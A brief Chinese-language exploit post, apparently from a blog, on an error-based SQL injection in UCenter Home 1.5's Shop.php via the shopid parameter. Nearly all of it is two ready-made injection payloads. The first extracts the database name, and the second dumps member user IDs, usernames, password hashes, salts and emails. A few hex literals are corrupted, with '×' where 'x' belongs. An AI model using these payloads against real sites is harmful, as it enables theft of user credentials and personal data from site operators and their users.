UCenter_Home15.rar

漏洞文件 : Shop.php 漏洞表现: ?ac=view&shopid= 漏洞类型 : SQL Injection (MySQL Error Based) 利用POC： 1、查询出UC_HOME的DATABSE： and (select 1 from(select count(*),concat((select (select concat(0x7e,0×27,unhex(hex(database())),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 2、根据1查询出的DATABSE（替换XXOO_UC_DB），进一步注入出member信息: and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0×27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.salt,0x3a,uc_members.email) as char),0×27,0x7e) from `XXOO_UC_DB`.uc_members LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 trackback